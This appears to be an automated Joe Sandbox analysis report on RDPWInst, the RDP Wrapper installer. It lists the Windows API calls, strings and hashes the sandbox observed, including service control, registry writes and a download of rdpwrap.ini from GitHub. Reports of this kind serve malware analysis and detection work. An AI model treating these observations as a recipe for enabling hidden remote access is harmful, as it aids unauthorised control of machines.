                                                                                                              • Instruction Fuzzy Hash: 43114270A4421CABDB10EB51CD86BDD73B8DB04304F5144FBB509B72D1DA785E858A59
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F788
                                                                                                              • GetLastError.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F79A
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesErrorFileLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1799206407-0
                                                                                                              • Opcode ID: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                                              • Instruction ID: 8407d2a862a87125c88b0e9e376b57c3f61afd3adb54f06dd13a213247f2bd06
                                                                                                              • Opcode Fuzzy Hash: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                                              • Instruction Fuzzy Hash: 5CE04F1732122016DD3530BC19CA6AB1244498B7A83280937FC51F3BD2D23E4D5B519F
                                                                                                              APIs
                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004046DF
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004046E8
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 442123175-0
                                                                                                              APIs
                                                                                                              • InterlockedCompareExchange.KERNEL32(00449DB0,00000001,00000000), ref: 00414644
                                                                                                              • CloseHandle.KERNEL32(00000000,00449DB0,00000001,00000000,?,00449EB4,00414694,00449EB4,00000000,?,0041770A,00000000,00417872), ref: 00414651
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCompareExchangeHandleInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 190309047-0
                                                                                                              APIs
                                                                                                              • RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                                              • RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseFlush
                                                                                                              • String ID:
                                                                                                              • API String ID: 320916635-0
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 004083CE
                                                                                                                • Part of subcall function 0040920C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                                                • Part of subcall function 0040920C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName$LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 4113206344-0
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000,?,?,004257A8,0042F5F0,00000000,0042F6D7,?,?,004257A8), ref: 0040F68A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              APIs
                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040F6D4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3934441357-0
                                                                                                              APIs
                                                                                                              • GetNativeSystemInfo.KERNEL32 ref: 0043A648
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoNativeSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 1721193555-0
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00447324,0043D137,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F7CF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000001,0040F8C6,00000000,0040F8EB,?,00447324,00000000,00000000,00000000,00000000,?,0043D15F,00000000,0043D55E), ref: 0040FB69
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateDirectory
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • lstrcpynW.KERNEL32(?,00000000,?,00000000,004093AD,?,?,?,00000000), ref: 0040937A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: lstrcpyn
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402AE3
                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00402B06
                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00402B13
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$Free$Query
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                                              • GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                                                • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                                                • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B61F
                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B62E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Service$CloseErrorHandleLastOpen$Manager
                                                                                                              • String ID: $sD$...$OpenSCManager$OpenService$ServicesActive$StartService$[*] Starting
                                                                                                              APIs
                                                                                                              • InternetOpenW.WININET(RDP Wrapper Update,00000000,00000000,00000000,00000000), ref: 0043CF9B
                                                                                                              • InternetOpenUrlW.WININET(00000000,https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini,00000000,00000000,80000000,00000000), ref: 0043CFB7
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0043CFC3
                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0043CFDB
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0043D002
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0043D008
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Internet$CloseHandle$Open$FileRead
                                                                                                              • String ID: $sD$RDP Wrapper Update$https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                                                                                                              APIs
                                                                                                              • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E8B
                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E9E
                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EB4
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EC0
                                                                                                              • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 00408EFC
                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00408F08
                                                                                                              • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00408F2B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: lstrcpyn$Findlstrlen$CloseFileFirst
                                                                                                              • String ID: \
                                                                                                              APIs
                                                                                                              • IsValidLocale.KERNEL32(?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089B4
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089D0
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Locale$Info$Valid
                                                                                                              • String ID:
                                                                                                              • API String ID: 1826331170-0
                                                                                                              • Opcode ID: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                                              • Instruction ID: a5145651339b4fb3455c536bf826b1f6d015bb6bedb64d7d22cca76e959b3329
                                                                                                              • Opcode Fuzzy Hash: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                                              • Instruction Fuzzy Hash: 4031C274A00618ABDF20EB55DD81BAF77B5EB44700F1040BBA588B72D1DA7D5E40CF5A
                                                                                                              APIs
                                                                                                              • GetVersionExW.KERNEL32(?,00443136,00000000,0044315A), ref: 004146A6
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Version
                                                                                                              • String ID: 8[D
                                                                                                              • API String ID: 1889659487-4257705004
                                                                                                              • Opcode ID: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                                              • Instruction ID: 2f0940f951a798b0a8c1b92e6229d48fd5c0b6d32f60b1d075f360ba34157daa
                                                                                                              • Opcode Fuzzy Hash: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                                              • Instruction Fuzzy Hash: 7DF030B8605B419FDB00DF18E845659B7E0EB89314F00483AF485D7391D738A844CB6E
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000), ref: 0040F757
                                                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000), ref: 0040F762
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 2295610775-0
                                                                                                              • Opcode ID: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                                              • Instruction ID: 44d6f2536772e544dca19d4554f13a915e571bc99722c0a0b507a91726501656
                                                                                                              • Opcode Fuzzy Hash: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                                              • Instruction Fuzzy Hash: B9E0CD6261470815C72065B90CC9B5B728C5B04328F040BB77D5CF35D2FA3D8554115F
                                                                                                              APIs
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0040FB09
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DiskFreeSpace
                                                                                                              • String ID:
                                                                                                              • API String ID: 1705453755-0
                                                                                                              • Opcode ID: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                                              • Instruction ID: 58712635a06311b99fbeb36610203dfa2cb34c225fc8d295b9fe620e031658d4
                                                                                                              • Opcode Fuzzy Hash: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                                              • Instruction Fuzzy Hash: DC1112B5E00209AFDB04CF99C881DAFF7F9EFC8304B14C569A508E7254E6319A018B90
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID:
                                                                                                              • API String ID: 2299586839-0
                                                                                                              • Opcode ID: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                                              • Instruction ID: 9da8dff9c55e20549594a614ff7d844013acaeb15ab394cddf5a90cc700bc9e0
                                                                                                              • Opcode Fuzzy Hash: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                                              • Instruction Fuzzy Hash: 69E0927170021817E314A5695C86DEB725C9B58300F00417FBA06D7387EDB89D6046ED
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID:
                                                                                                              • API String ID: 2299586839-0
                                                                                                              • Opcode ID: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                                              • Instruction ID: 70141b24f99fd98ac1db3019ee377dee0462c825b9fd2fb3f3473e8324f2be5c
                                                                                                              • Opcode Fuzzy Hash: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                                              • Instruction Fuzzy Hash: 01E0DF3270031827F31495689D86EFB729C9B58300F00427BBE06D3382FDB49DA046E9
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0041524C,00000000,00415476,?,?,00000000,00000000), ref: 00412CAB
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID:
                                                                                                              • API String ID: 2299586839-0
                                                                                                              • Opcode ID: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                                              • Instruction ID: c0299d43d85d1b47cbbe3802d462e1d0899c6c80b318dcec9f9e75b03fa43e2d
                                                                                                              • Opcode Fuzzy Hash: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                                              • Instruction Fuzzy Hash: 17D05EB63092202AE210525B6E45DBF56DCCBC87A2F10443BBA48C6242E268CC5693F9
                                                                                                              APIs
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocalTime
                                                                                                              • String ID:
                                                                                                              • API String ID: 481472006-0
                                                                                                              • Opcode ID: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                                              • Instruction ID: 9e8cd4c1e66a35051b5eb1694121f13696e39ccab0ec977751e8beb904ec194d
                                                                                                              • Opcode Fuzzy Hash: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                                              • Instruction Fuzzy Hash: D1A0110080882002C2803B2A0C032383080A800A30FC80BAAB8F8A02E2EA2E023088AB
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 00417D39
                                                                                                                • Part of subcall function 00417D04: GetProcAddress.KERNEL32(00000000), ref: 00417D1D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                              • API String ID: 1646373207-1918263038
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE85
                                                                                                              • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE90
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AED6
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE2
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
